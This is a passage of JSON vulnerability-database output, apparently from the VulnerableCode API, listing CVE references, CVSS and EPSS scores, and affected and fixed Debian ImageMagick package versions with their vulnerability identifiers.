"reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732289", "reference_id": "1732289", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732289" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931191", "reference_id": "931191", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931191" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-12977" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rzge-64xp-bfej" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/79200?format=api", "vulnerability_id": "VCID-s7tx-uu27-xqb5", "summary": "security update", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13300.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13300.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00198", "scoring_system": "epss", "scoring_elements": "0.41731", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00198", "scoring_system": "epss", "scoring_elements": "0.41805", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42289", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42318", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42259", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.4231", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42341", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42304", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42276", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42326", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42302", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00202", "scoring_system": "epss", "scoring_elements": "0.42214", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": 